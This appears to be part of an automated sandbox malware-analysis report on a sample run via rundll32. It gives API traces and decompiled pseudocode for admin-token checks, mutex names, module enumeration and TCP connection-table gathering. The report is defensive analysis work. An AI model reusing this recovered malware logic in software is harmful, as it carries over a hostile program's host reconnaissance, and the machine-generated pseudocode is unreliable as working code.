                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                              • Part of subcall function 04649390: wsprintfW.USER32 ref: 046493CE
                                                              • Part of subcall function 04649390: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 046493E0
                                                              • Part of subcall function 04649390: GetLastError.KERNEL32 ref: 046493F1
                                                              • Part of subcall function 04649390: CloseHandle.KERNEL32(?), ref: 04649401
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0464B64E
                                                            • GetTickCount.KERNEL32 ref: 0464B65A
                                                            • GetTickCount.KERNEL32 ref: 0464B65D
                                                            • wsprintfA.USER32 ref: 0464B66D
                                                            • CreateThread.KERNEL32(00000000,00000000,0464C0A0,00000000,00000000,00000000), ref: 0464B695
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464B698
                                                            • CreateThread.KERNEL32(00000000,00000000,0463E6E0,00000000,00000000,00000000), ref: 0464B6B2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464B6B5
                                                            • GetTickCount.KERNEL32 ref: 0464B88F
                                                            • GetTickCount.KERNEL32 ref: 0464B8B9
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0464B8FA
                                                            • lstrcpy.KERNEL32(0000000C,?), ref: 0464B91C
                                                            • lstrcpyW.KERNEL32(046878D8,?), ref: 0464B92F
                                                            • Sleep.KERNEL32(000003E8), ref: 0464B9B1
                                                            • Sleep.KERNEL32(00002710,Control), ref: 0464B9F7
                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 0464BA6F
                                                            • Sleep.KERNEL32(000001F4), ref: 0464BAB6
                                                            • Sleep.KERNEL32(000003E8), ref: 0464BADC
                                                            • OpenEventA.KERNEL32(001F0003,00000001,Global\CONN0000000000), ref: 0464BAEA
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464BB06
                                                            • lstrcpyW.KERNEL32(046864A4,[CONN]), ref: 0464BB16
                                                            • CloseHandle.KERNEL32(?), ref: 0464BB73
                                                            • SetErrorMode.KERNEL32(00000000), ref: 0464BB77
                                                            • CloseHandle.KERNEL32(?), ref: 0464BB86
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464BB93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CountCreateEventSleepTick$Errorlstrcpy$ModeOpenThreadwsprintf$AllocateCheckFreeInitializeLastMembershipToken
                                                            • String ID: 20220829$Control$Global\%d%d$Global\CONN0000000000$[CONN]$v20220829
                                                            • API String ID: 2334699370-1326833230
                                                            • Opcode ID: bf80ece8eb9517b39f2ee57bb9ec394987155a909f4fe798a3c0a05089efc98a
                                                            • Instruction ID: e15640131d77b163d22ea496acbe57ced7299e60911dcef6d66430c0c2d8e49d
                                                            • Opcode Fuzzy Hash: bf80ece8eb9517b39f2ee57bb9ec394987155a909f4fe798a3c0a05089efc98a
                                                            • Instruction Fuzzy Hash: 3BF18E70604341AFEB24DF64D888B6AB7E4FF94B09F04052DE9499B280FB75F944CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E04644850(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				WCHAR* _v16;
                                                            				WCHAR* _v20;
                                                            				WCHAR* _v24;
                                                            				WCHAR* _v28;
                                                            				struct tagPROCESSENTRY32W _v32;
                                                            				void* _v36;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				WCHAR* _t105;
                                                            				WCHAR* _t106;
                                                            				WCHAR* _t107;
                                                            				WCHAR* _t108;
                                                            				struct tagPROCESSENTRY32W _t110;
                                                            				int _t126;
                                                            				int _t127;
                                                            				int _t128;
                                                            				int _t129;
                                                            				int _t130;
                                                            				signed short* _t178;
                                                            				signed int _t179;
                                                            				signed int _t185;
                                                            				WCHAR* _t186;
                                                            				void* _t187;
                                                            				void* _t188;
                                                            				WCHAR* _t189;
                                                            				void* _t192;
                                                            				signed int _t195;
                                                            				WCHAR* _t196;
                                                            				WCHAR* _t197;
                                                            				intOrPtr* _t198;
                                                            				struct tagPROCESSENTRY32W _t201;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				void* _t207;
                                                            				struct tagPROCESSENTRY32W _t208;
                                                            				WCHAR* _t209;
                                                            				void* _t210;
                                                            				long _t218;
                                                            				long _t219;
                                                            				void* _t222;
                                                            				void* _t224;
                                                            				void* _t226;
                                                            				void* _t228;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				void* _t233;
                                                            				void* _t239;
                                                            
                                                            				_t239 = __eflags;
                                                            				_t187 = __ecx;
                                                            				_t210 = LocalAlloc(0x40, 0x400);
                                                            				_v12 = 1;
                                                            				_push(0x208);
                                                            				_v8 = _t210;
                                                            				 *_t210 = 0x81;
                                                            				_t105 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_t186 = _t105;
                                                            				_t106 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_v16 = _t106;
                                                            				_t107 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x208);
                                                            				_v20 = _t107;
                                                            				_t108 = L04655B55(_t187, _t210, _t239);
                                                            				_push(0x28);
                                                            				_v24 = _t108;
                                                            				_v28 = L04655B55(_t187, _t210, _t239);
                                                            				_t110 = L04655B14(_t210, _t239, 0x428);
                                                            				_t231 = _t230 + 0x18;
                                                            				_t208 = _t110;
                                                            				_v32 = _t208;
                                                            				 *_t208 = 0x428;
                                                            				_t188 = CreateToolhelp32Snapshot(0x18, _a4);
                                                            				_v36 = _t188;
                                                            				if(_t188 != 0xffffffff) {
                                                            					if(Module32FirstW(_t188, _t208) != 0) {
                                                            						_t10 = _t208 + 0x20; // 0x20
                                                            						_t209 = _t208 + 0x220;
                                                            						_a4 = _t10;
                                                            						do {
                                                            							if( *_t209 != 0x3f005c || _t209[2] != 0x5c003f) {
                                                            								_t189 = _t209;
                                                            								_t198 = L"\\SystemRoot";
                                                            								_t210 = 0x12;
                                                            								while(1) {
                                                            									__eflags =  *_t189 -  *_t198;
                                                            									if( *_t189 !=  *_t198) {
                                                            										goto L16;
                                                            									}
                                                            									_t189 =  &(_t189[2]);
                                                            									_t198 = _t198 + 4;
                                                            									_t210 = _t210 - 4;
                                                            									__eflags = _t210;
                                                            									if(_t210 >= 0) {
                                                            										continue;
                                                            									} else {
                                                            										__eflags =  *_t189 -  *_t198;
                                                            										if( *_t189 ==  *_t198) {
                                                            											wsprintfW(_t186, L"C:\\WINDOWS%s", _v32 + 0x24c);
                                                            											_t231 = _t231 + 0xc;
                                                            											_t197 = _t186;
                                                            											_t207 = _t209 - _t186;
                                                            											asm("o16 nop [eax+eax]");
                                                            											do {
                                                            												_t185 =  *_t197 & 0x0000ffff;
                                                            												_t197 =  &(_t197[1]);
                                                            												 *(_t207 + _t197 - 2) = _t185;
                                                            												__eflags = _t185;
                                                            											} while (_t185 != 0);
                                                            										}
                                                            									}
                                                            									goto L16;
                                                            								}
                                                            							} else {
                                                            								_t178 = _v32 + 0x230;
                                                            								_t203 = _t186 - _t178;
                                                            								do {
                                                            									_t195 =  *_t178 & 0x0000ffff;
                                                            									_t178 =  &(_t178[1]);
                                                            									 *(_t203 + _t178 - 2) = _t195;
                                                            								} while (_t195 != 0);
                                                            								_t196 = _t186;
                                                            								_t205 = _t209 - _t186;
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									_t179 =  *_t196 & 0x0000ffff;
                                                            									_t196 =  &(_t196[1]);
                                                            									 *(_t205 + _t196 - 2) = _t179;
                                                            								} while (_t179 != 0);
                                                            							}
                                                            							L16:
                                                            							E04645DD0(_t186, _t209, _v16, _t209, _t210, _v20, _v24);
                                                            							asm("xorps xmm0, xmm0");
                                                            							_t233 = _t231 + 8;
                                                            							asm("movups [eax], xmm0");
                                                            							asm("movups [eax+0x10], xmm0");
                                                            							asm("movq [eax+0x20], xmm0");
                                                            							E04644790(_t209, _v28, _t210);
                                                            							_t126 = lstrlenW(_t209);
                                                            							_t127 = lstrlenW(_v28);
                                                            							_t128 = lstrlenW(_v24);
                                                            							_t129 = lstrlenW(_v20);
                                                            							_t130 = lstrlenW(_v16);
                                                            							_t218 = _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _v12 + 0x14;
                                                            							if(LocalSize(_v8) >= _t218) {
                                                            								_t192 = _v8;
                                                            							} else {
                                                            								_t192 = LocalReAlloc(_v8, _t218, 0x42);
                                                            								_v8 = _t192;
                                                            							}
                                                            							_t201 = _v32;
                                                            							_t219 = _v12;
                                                            							 *((intOrPtr*)(_t219 + _t192)) =  *((intOrPtr*)(_t201 + 0x14));
                                                            							 *((intOrPtr*)(_t219 + _t192 + 4)) =  *((intOrPtr*)(_t201 + 0x18));
                                                            							_v12 = _t219 + 8;
                                                            							E0465E060(_v8 + _v12, _a4, 2 + lstrlenW(_t201 + 0x20) * 2);
                                                            							_t222 = _v12 + 2 + lstrlenW(_a4) * 2;
                                                            							E0465E060(_v8 + _t222, _t209, 2 + lstrlenW(_t209) * 2);
                                                            							_t224 = _t222 + lstrlenW(_t209) * 2 + 2;
                                                            							E0465E060(_v8 + _t224, _v16, 2 + lstrlenW(_v16) * 2);
                                                            							_t226 = _t224 + lstrlenW(_v16) * 2 + 2;
                                                            							E0465E060(_v8 + _t226, _v20, 2 + lstrlenW(_v20) * 2);
                                                            							_t228 = _t226 + lstrlenW(_v20) * 2 + 2;
                                                            							E0465E060(_v8 + _t228, _v24, 2 + lstrlenW(_v24) * 2);
                                                            							_t210 = _t228 + lstrlenW(_v24) * 2 + 2;
                                                            							E0465E060(_v8 + _t210, _v28, 2 + lstrlenW(_v28) * 2);
                                                            							_t231 = _t233 + 0x48;
                                                            							_v12 = _t210 + (lstrlenW(_v28) + 1) * 2;
                                                            						} while (Module32NextW(_v36, _v32) != 0);
                                                            						_t210 = _v8;
                                                            						_t208 = _v32;
                                                            					}
                                                            					CloseHandle(_v36);
                                                            				}
                                                            				L04655B0F(_t186);
                                                            				L04655B0F(_v16);
                                                            				L04655B0F(_v20);
                                                            				L04655B0F(_v24);
                                                            				L04655B0F(_v28);
                                                            				_push(0x428);
                                                            				E04655B47(_t208);
                                                            				return LocalReAlloc(_t210, _v12, 0x42);
                                                            			}





















































                                                            0x04644850
                                                            0x04644850
                                                            0x04644866
                                                            0x04644868
                                                            0x0464486f
                                                            0x04644874
                                                            0x04644877
                                                            0x0464487a
                                                            0x0464487f
                                                            0x04644884
                                                            0x04644886
                                                            0x0464488b
                                                            0x04644890
                                                            0x04644893
                                                            0x04644898
                                                            0x0464489d
                                                            0x046448a0
                                                            0x046448a5
                                                            0x046448a7
                                                            0x046448b4
                                                            0x046448b7
                                                            0x046448bc
                                                            0x046448bf
                                                            0x046448c1
                                                            0x046448c7
                                                            0x046448d5
                                                            0x046448d7
                                                            0x046448dd
                                                            0x046448ed
                                                            0x046448f3
                                                            0x046448f6
                                                            0x046448fc
                                                            0x04644900
                                                            0x04644906
                                                            0x04644952
                                                            0x04644954
                                                            0x04644959
                                                            0x04644960
                                                            0x04644962
                                                            0x04644964
                                                            0x00000000
                                                            0x00000000
                                                            0x04644966
                                                            0x04644969
                                                            0x0464496c
                                                            0x0464496c
                                                            0x0464496f
                                                            0x00000000
                                                            0x04644971
                                                            0x04644974
                                                            0x04644977
                                                            0x04644988
                                                            0x04644990
                                                            0x04644993
                                                            0x04644995
                                                            0x04644997
                                                            0x046449a0
                                                            0x046449a0
                                                            0x046449a3
                                                            0x046449a6
                                                            0x046449ab
                                                            0x046449ab
                                                            0x046449a0
                                                            0x04644977
                                                            0x00000000
                                                            0x0464496f
                                                            0x04644911
                                                            0x04644916
                                                            0x0464491b
                                                            0x04644920
                                                            0x04644920
                                                            0x04644923
                                                            0x04644926
                                                            0x0464492b
                                                            0x04644932
                                                            0x04644934
                                                            0x04644936
                                                            0x04644940
                                                            0x04644940
                                                            0x04644943
                                                            0x04644946
                                                            0x0464494b
                                                            0x04644950
                                                            0x046449b0
                                                            0x046449bb
                                                            0x046449c3
                                                            0x046449c6
                                                            0x046449cd
                                                            0x046449d0
                                                            0x046449d4
                                                            0x046449d9
                                                            0x046449df
                                                            0x046449ea
                                                            0x046449f5
                                                            0x04644a00
                                                            0x04644a0b
                                                            0x04644a29
                                                            0x04644a33
                                                            0x04644a48
                                                            0x04644a35
                                                            0x04644a41
                                                            0x04644a43
                                                            0x04644a43
                                                            0x04644a4b
                                                            0x04644a4e
                                                            0x04644a54
                                                            0x04644a5a
                                                            0x04644a64
                                                            0x04644a82
                                                            0x04644a96
                                                            0x04644aae
                                                            0x04644ac3
                                                            0x04644add
                                                            0x04644af4
                                                            0x04644b0e
                                                            0x04644b25
                                                            0x04644b3f
                                                            0x04644b53
                                                            0x04644b70
                                                            0x04644b75
                                                            0x04644b8b
                                                            0x04644b94
                                                            0x04644b9c
                                                            0x04644b9f
                                                            0x04644b9f
                                                            0x04644ba5
                                                            0x04644ba5
                                                            0x04644bac
                                                            0x04644bb4
                                                            0x04644bbc
                                                            0x04644bc4
                                                            0x04644bcc
                                                            0x04644bd1
                                                            0x04644bd7
                                                            0x04644bf1

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00000400), ref: 04644860
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000018,00000001), ref: 046448CF
                                                            • Module32FirstW.KERNEL32(00000000,00000000), ref: 046448E5
                                                            • wsprintfW.USER32 ref: 04644988
                                                            • lstrlenW.KERNEL32(-00000220), ref: 046449DF
                                                            • lstrlenW.KERNEL32(?), ref: 046449EA
                                                            • lstrlenW.KERNEL32(?), ref: 046449F5
                                                            • lstrlenW.KERNEL32(?), ref: 04644A00
                                                            • lstrlenW.KERNEL32(?), ref: 04644A0B
                                                            • lstrlenW.KERNEL32(00000001), ref: 04644A16
                                                            • LocalSize.KERNEL32(?), ref: 04644A2B
                                                            • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 04644A3B
                                                            • lstrlenW.KERNEL32(?), ref: 04644A6E
                                                            • lstrlenW.KERNEL32(00000001), ref: 04644A8D
                                                            • lstrlenW.KERNEL32(-00000220), ref: 04644A99
                                                            • lstrlenW.KERNEL32(-00000220), ref: 04644AB7
                                                            • lstrlenW.KERNEL32(?), ref: 04644AC6
                                                            • lstrlenW.KERNEL32(?), ref: 04644AE8
                                                            • lstrlenW.KERNEL32(?), ref: 04644AF7
                                                            • lstrlenW.KERNEL32(?), ref: 04644B19
                                                            • lstrlenW.KERNEL32(?), ref: 04644B28
                                                            • lstrlenW.KERNEL32(?), ref: 04644B4A
                                                            • lstrlenW.KERNEL32(?), ref: 04644B59
                                                            • lstrlenW.KERNEL32(?), ref: 04644B7B
                                                            • Module32NextW.KERNEL32(?,?), ref: 04644B8E
                                                            • CloseHandle.KERNEL32(?), ref: 04644BA5
                                                            • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 04644BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Local$Alloc$Module32$CloseCreateFirstHandleNextSizeSnapshotToolhelp32wsprintf
                                                            • String ID: C:\WINDOWS%s$\SystemRoot
                                                            • API String ID: 671652143-1245600093
                                                            • Opcode ID: 0e79597fc0d946513ddffcd1b7d61ff1eed54283d52fcf8801f54d036b1b648e
                                                            • Instruction ID: 8e0a6cf722af530380af94f20d1ee5d3be459182fee45873e46952f30dd025aa
                                                            • Opcode Fuzzy Hash: 0e79597fc0d946513ddffcd1b7d61ff1eed54283d52fcf8801f54d036b1b648e
                                                            • Instruction Fuzzy Hash: 2CB18F71E00119EBCF109FA8EC4DAAEBBB5FF44315F044068F905A7261FB36AA11DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0463D570(void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				short _v540;
                                                            				void* _v544;
                                                            				void* _v548;
                                                            				void* _v552;
                                                            				long _v556;
                                                            				signed int* _v560;
                                                            				intOrPtr _v576;
                                                            				intOrPtr _v580;
                                                            				intOrPtr _v584;
                                                            				intOrPtr _v588;
                                                            				_Unknown_base(*)() _v592;
                                                            				intOrPtr _v596;
                                                            				intOrPtr _v600;
                                                            				void* _v604;
                                                            				signed int _t97;
                                                            				_Unknown_base(*)()* _t102;
                                                            				signed int _t108;
                                                            				void* _t109;
                                                            				void* _t111;
                                                            				int _t125;
                                                            				signed int _t133;
                                                            				void* _t135;
                                                            				void* _t137;
                                                            				void* _t143;
                                                            				signed int* _t144;
                                                            				signed int* _t148;
                                                            				int _t161;
                                                            				signed int _t169;
                                                            				signed int* _t178;
                                                            				intOrPtr _t179;
                                                            				long _t180;
                                                            				_Unknown_base(*)()* _t184;
                                                            				intOrPtr _t185;
                                                            				long _t186;
                                                            				intOrPtr _t188;
                                                            				intOrPtr _t193;
                                                            				struct HINSTANCE__* _t195;
                                                            				signed int _t197;
                                                            				void* _t199;
                                                            				signed int* _t201;
                                                            				void* _t202;
                                                            				long _t204;
                                                            				void* _t208;
                                                            				void* _t211;
                                                            				signed int _t215;
                                                            				void* _t219;
                                                            				signed int _t222;
                                                            				void* _t223;
                                                            				void* _t228;
                                                            				void* _t231;
                                                            				void* _t233;
                                                            
                                                            				_t222 = (_t219 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t219 + 4));
                                                            				_t215 = _t222;
                                                            				_t223 = _t222 - 0x258;
                                                            				_t97 =  *0x4684008; // 0xd355be4e
                                                            				_v16 = _t97 ^ _t215;
                                                            				_push(__esi);
                                                            				_t204 = 0;
                                                            				_t195 = LoadLibraryA("iphlpapi.dll");
                                                            				if(_t195 == 0) {
                                                            					L5:
                                                            					return E04655AFE(_v16 ^ _t215);
                                                            				} else {
                                                            					_v604 = 0;
                                                            					_v600 = 1;
                                                            					_t102 = GetProcAddress(_t195, "GetExtendedTcpTable");
                                                            					_v548 = _t102;
                                                            					if(_t102 == 0) {
                                                            						_t197 = GetProcAddress(_t195, "AllocateAndGetTcpExTableFromStack");
                                                            						__eflags = _t197;
                                                            						if(_t197 == 0) {
                                                            							__eflags = 0;
                                                            							goto L24;
                                                            						} else {
                                                            							_v544 = 0;
                                                            							_t108 =  *_t197( &_v544, 1, GetProcessHeap(), 0, 2);
                                                            							__eflags = _t108;
                                                            							if(_t108 == 0) {
                                                            								_t109 = LocalAlloc(0x40, 0x2800);
                                                            								_t178 = _v544;
                                                            								_t199 = _t109;
                                                            								_v548 = 0;
                                                            								__eflags =  *_t178;
                                                            								if( *_t178 > 0) {
                                                            									_t188 = 0;
                                                            									_v552 = 0;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_v596 =  *((intOrPtr*)(_t188 +  &(_t178[2])));
                                                            										_v592 =  *((intOrPtr*)(_t188 +  &(_t178[3])));
                                                            										_v588 =  *((intOrPtr*)(_t188 +  &(_t178[4])));
                                                            										_v584 =  *((intOrPtr*)(_t188 +  &(_t178[5])));
                                                            										_t179 =  *((intOrPtr*)(_t188 +  &(_t178[6])));
                                                            										_push(_t179);
                                                            										_v580 =  *((intOrPtr*)(_t188 +  &(_t178[1])));
                                                            										_v576 = _t179;
                                                            										E0463D4D0(_t179,  &_v540);
                                                            										_t228 = _t223 + 4;
                                                            										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                            										_t125 = LocalSize(_t199);
                                                            										_t180 = _v556;
                                                            										__eflags = _t125 - _t180;
                                                            										if(_t125 < _t180) {
                                                            											_t199 = LocalReAlloc(_t199, _t180, 0x42);
                                                            										}
                                                            										asm("movups xmm0, [ebp-0x250]");
                                                            										asm("movups [esi+edi], xmm0");
                                                            										asm("movups xmm0, [ebp-0x240]");
                                                            										asm("movups [esi+edi+0x10], xmm0");
                                                            										_t208 = _t204 + 0x20;
                                                            										E0465E060(_t208 + _t199,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            										_t223 = _t228 + 0xc;
                                                            										_t133 = lstrlenW( &_v540);
                                                            										_t178 = _v544;
                                                            										_t188 = _v552 + 0x18;
                                                            										_v552 = _t188;
                                                            										_t204 = _t208 + _t133 * 2 + 2;
                                                            										_t135 = _v548 + 1;
                                                            										_v548 = _t135;
                                                            										__eflags = _t135 -  *_t178;
                                                            									} while (_t135 <  *_t178);
                                                            								}
                                                            								LocalReAlloc(_t199, _t204, 0x42);
                                                            								_t111 = _v544;
                                                            								__eflags = _t111;
                                                            								if(_t111 != 0) {
                                                            									HeapFree(GetProcessHeap(), 0, _t111);
                                                            								}
                                                            								goto L24;
                                                            							} else {
                                                            								_t137 = _v544;
                                                            								__eflags = _t137;
                                                            								if(_t137 == 0) {
                                                            									goto L5;
                                                            								} else {
                                                            									HeapFree(GetProcessHeap(), 0, _t137);
                                                            									__eflags = _v16 ^ _t215;
                                                            									return E04655AFE(_v16 ^ _t215);
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_v544 = 0;
                                                            						_t143 =  *_t102(0,  &_v544, 1, 2, 5, 0);
                                                            						_t237 = _t143 - 0x7a;
                                                            						if(_t143 != 0x7a) {
                                                            							goto L5;
                                                            						} else {
                                                            							_push(_v544);
                                                            							_t144 = L04655B55( &_v544, 0, _t237);
                                                            							_t231 = _t223 + 4;
                                                            							_t201 = _t144;
                                                            							_v560 = _t201;
                                                            							_push(0);
                                                            							_push(5);
                                                            							_push(2);
                                                            							_push(1);
                                                            							_push( &_v544);
                                                            							_push(_t201);
                                                            							if(_v548() == 0) {
                                                            								_t202 = LocalAlloc(0x40, 0x2800);
                                                            								_v552 = 0;
                                                            								_t148 = _v560;
                                                            								__eflags =  *_t148;
                                                            								if( *_t148 > 0) {
                                                            									_t184 =  &(_t148[3]);
                                                            									_v548 = _t184;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_v596 =  *((intOrPtr*)(_t184 - 4));
                                                            										_v592 =  *_t184;
                                                            										_v588 =  *((intOrPtr*)(_t184 + 4));
                                                            										_v584 =  *((intOrPtr*)(_t184 + 8));
                                                            										_t185 =  *((intOrPtr*)(_t184 + 0xc));
                                                            										_push(_t185);
                                                            										_v580 =  *((intOrPtr*)(_t184 - 8));
                                                            										_v576 = _t185;
                                                            										E0463D4D0(_t185,  &_v540);
                                                            										_t233 = _t231 + 4;
                                                            										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                            										_t161 = LocalSize(_t202);
                                                            										_t186 = _v556;
                                                            										__eflags = _t161 - _t186;
                                                            										if(_t161 < _t186) {
                                                            											_t202 = LocalReAlloc(_t202, _t186, 0x42);
                                                            										}
                                                            										asm("movups xmm0, [ebp-0x250]");
                                                            										asm("movups [esi+edi], xmm0");
                                                            										asm("movups xmm0, [ebp-0x240]");
                                                            										asm("movups [esi+edi+0x10], xmm0");
                                                            										_t211 = _t204 + 0x20;
                                                            										E0465E060(_t211 + _t202,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            										_t231 = _t233 + 0xc;
                                                            										_t169 = lstrlenW( &_v540);
                                                            										_t193 = _v552 + 1;
                                                            										_t184 = _v548 + 0x18;
                                                            										_v552 = _t193;
                                                            										_v548 = _t184;
                                                            										_t204 = _t211 + _t169 * 2 + 2;
                                                            										__eflags = _t193 -  *_v560;
                                                            									} while (_t193 <  *_v560);
                                                            								}
                                                            								_v556 = LocalReAlloc(_t202, _t204, 0x42);
                                                            								L04655B0F(_v560);
                                                            								L24:
                                                            								__eflags = _v16 ^ _t215;
                                                            								return E04655AFE(_v16 ^ _t215);
                                                            							} else {
                                                            								L04655B0F(_t201);
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
























































                                                            0x0463d579
                                                            0x0463d580
                                                            0x0463d584
                                                            0x0463d586
                                                            0x0463d58c
                                                            0x0463d593
                                                            0x0463d596
                                                            0x0463d59d
                                                            0x0463d5a5
                                                            0x0463d5a9
                                                            0x0463d629
                                                            0x0463d63d
                                                            0x0463d5ab
                                                            0x0463d5b1
                                                            0x0463d5b7
                                                            0x0463d5c1
                                                            0x0463d5c7
                                                            0x0463d5cf
                                                            0x0463d7a1
                                                            0x0463d7a3
                                                            0x0463d7a5
                                                            0x0463d95c
                                                            0x00000000
                                                            0x0463d7ab
                                                            0x0463d7af
                                                            0x0463d7c5
                                                            0x0463d7c7
                                                            0x0463d7c9
                                                            0x0463d806
                                                            0x0463d80c
                                                            0x0463d812
                                                            0x0463d814
                                                            0x0463d81a
                                                            0x0463d81c
                                                            0x0463d822
                                                            0x0463d824
                                                            0x0463d82a
                                                            0x0463d830
                                                            0x0463d834
                                                            0x0463d83e
                                                            0x0463d848
                                                            0x0463d852
                                                            0x0463d85c
                                                            0x0463d866
                                                            0x0463d867
                                                            0x0463d86d
                                                            0x0463d873
                                                            0x0463d878
                                                            0x0463d892
                                                            0x0463d898
                                                            0x0463d89e
                                                            0x0463d8a4
                                                            0x0463d8a6
                                                            0x0463d8b2
                                                            0x0463d8b2
                                                            0x0463d8b4
                                                            0x0463d8c2
                                                            0x0463d8c6
                                                            0x0463d8cd
                                                            0x0463d8d2
                                                            0x0463d8ee
                                                            0x0463d8f3
                                                            0x0463d8fd
                                                            0x0463d903
                                                            0x0463d90f
                                                            0x0463d915
                                                            0x0463d921
                                                            0x0463d924
                                                            0x0463d925
                                                            0x0463d92b
                                                            0x0463d92b
                                                            0x0463d830
                                                            0x0463d937
                                                            0x0463d93f
                                                            0x0463d945
                                                            0x0463d947
                                                            0x0463d954
                                                            0x0463d954
                                                            0x00000000
                                                            0x0463d7cb
                                                            0x0463d7cb
                                                            0x0463d7d1
                                                            0x0463d7d3
                                                            0x00000000
                                                            0x0463d7d9
                                                            0x0463d7e4
                                                            0x0463d7f1
                                                            0x0463d7fe
                                                            0x0463d7fe
                                                            0x0463d7d3
                                                            0x0463d7c9
                                                            0x0463d5d5
                                                            0x0463d5e2
                                                            0x0463d5ea
                                                            0x0463d5ec
                                                            0x0463d5ef
                                                            0x00000000
                                                            0x0463d5f1
                                                            0x0463d5f1
                                                            0x0463d5f7
                                                            0x0463d5fc
                                                            0x0463d5ff
                                                            0x0463d607
                                                            0x0463d60d
                                                            0x0463d60e
                                                            0x0463d610
                                                            0x0463d612
                                                            0x0463d614
                                                            0x0463d615
                                                            0x0463d61e
                                                            0x0463d64b
                                                            0x0463d64d
                                                            0x0463d653
                                                            0x0463d659
                                                            0x0463d65b
                                                            0x0463d661
                                                            0x0463d664
                                                            0x0463d66a
                                                            0x0463d670
                                                            0x0463d679
                                                            0x0463d681
                                                            0x0463d68a
                                                            0x0463d693
                                                            0x0463d69c
                                                            0x0463d69f
                                                            0x0463d6a0
                                                            0x0463d6a6
                                                            0x0463d6ac
                                                            0x0463d6b1
                                                            0x0463d6cb
                                                            0x0463d6d1
                                                            0x0463d6d7
                                                            0x0463d6dd
                                                            0x0463d6df
                                                            0x0463d6eb
                                                            0x0463d6eb
                                                            0x0463d6ed
                                                            0x0463d6fb
                                                            0x0463d6ff
                                                            0x0463d706
                                                            0x0463d70b
                                                            0x0463d727
                                                            0x0463d72c
                                                            0x0463d736
                                                            0x0463d748
                                                            0x0463d749
                                                            0x0463d74c
                                                            0x0463d755
                                                            0x0463d761
                                                            0x0463d764
                                                            0x0463d764
                                                            0x0463d670
                                                            0x0463d77c
                                                            0x0463d782
                                                            0x0463d95e
                                                            0x0463d964
                                                            0x0463d972
                                                            0x0463d620
                                                            0x0463d621
                                                            0x00000000
                                                            0x0463d626
                                                            0x0463d61e
                                                            0x0463d5ef
                                                            0x0463d5cf

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D59F
                                                            • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0463D5C1
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463D645
                                                            • lstrlenW.KERNEL32(?), ref: 0463D6BB
                                                            • LocalSize.KERNEL32(00000000), ref: 0463D6D1
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463D6E5
                                                            • lstrlenW.KERNEL32(?), ref: 0463D70E
                                                            • lstrlenW.KERNEL32(?), ref: 0463D736
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463D770
                                                            • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 0463D79B
                                                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 0463D7B5
